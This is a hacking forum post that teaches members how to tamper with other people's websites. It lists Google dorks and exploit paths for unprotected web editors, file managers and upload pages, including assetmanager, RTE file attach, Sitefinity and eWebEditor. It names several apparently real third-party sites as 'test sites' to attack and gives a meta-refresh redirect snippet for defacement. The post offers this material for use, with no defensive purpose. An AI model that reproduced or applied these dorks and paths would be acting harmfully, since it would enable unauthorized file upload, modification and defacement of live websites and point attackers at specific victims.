Hello THT members, here I will teach you how you can delete and modify a site's FTP files, that is, hack it.
Editor Vulnerability
dork:editor/assetmanager/
siteadi.com/Editor/assetmanager/assetmanager.asp or /Editor/assetmanager/assetmanager.php
It may be installed in different directories.
It is usually under Editor/asset/?
Editor Test Site
asp
http://davton.com/admin/MembersAreaM...setmanager.asp
http://trackdata.com.au/Editor/asset...lter=&upload=Y
http://www.1bakersfield.com/Editor/a...setmanager.asp
php
http://taxihoanglong.com.vn/Editor/a...?ffilter=image
http://www.lancasterdepewponytails.c...setmanager.php
RTE Vulnerability
Google Dorks:
inurl:rte/my_********s/my_files/
inurl:/my_********s/my_files/
Exploit: site.com/rte/RTE_popup_file_atch.asp
display_form_submission.asp
editar_pagina.asp
editar_pagina.asp.aspx
editar_pagina.aspx
editar_pagina2.asp
favicon.ico
non_RTE_javascript.asp
non_RTE_upload_files.asp
non_RTE_upload_images.asp
pagina.aspx
RTE_editor_inc.asp
RTE_file_browser.asp
RTE_javascript.asp
RTE_javascript_common.asp
RTE_javascript_gecko.asp
RTE_popup_about.asp
RTE_popup_adv_image.asp
RTE_popup_emoticons.asp
RTE_popup_file_atch.asp
RTE_popup_image.asp
RTE_popup_image_preview.asp
RTE_popup_link.asp
RTE_popup_link_preview.asp
RTE_popup_open_file.asp
RTE_popup_preview.asp
RTE_popup_save_file.asp
RTE_popup_special_characters.asp
RTE_popup_table.asp
RTE_popup_word_paste.asp
RTE Test Site
http://www.jrf.org.tw/newjrf/rte/RTE..._file_atch.asp
http://www.richmond-utcoll.ac.uk/spo..._file_atch.asp
Attach File Properties
http://mhc.thelearningcentre.ie/rte/..._file_atch.asp
Sitefinity: Login Vulnerability
Dork: "Sitefinity: Login"
exploit: Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
Upload Vulnerability
inurl:"/admin/saveannounce_upload.asp"
inurl:"admin/eWebEditor/Upload.asp"
inurl:"UploadFile/upload.asp"
inurl:/cgi-bin/ourspace/
/cgi-bin/ourspace/newswire/uploadmedia.cgi.
WebMaster Vulnerability
index.asp?PID=1
index.asp?AL=1
<**** http-equiv="*******" content="0;URL=http://testsite.com">
Xpoll Vulnerability
inurl:xpoll/admin
[Edit darkdesert// THIS IS A QUOTE]



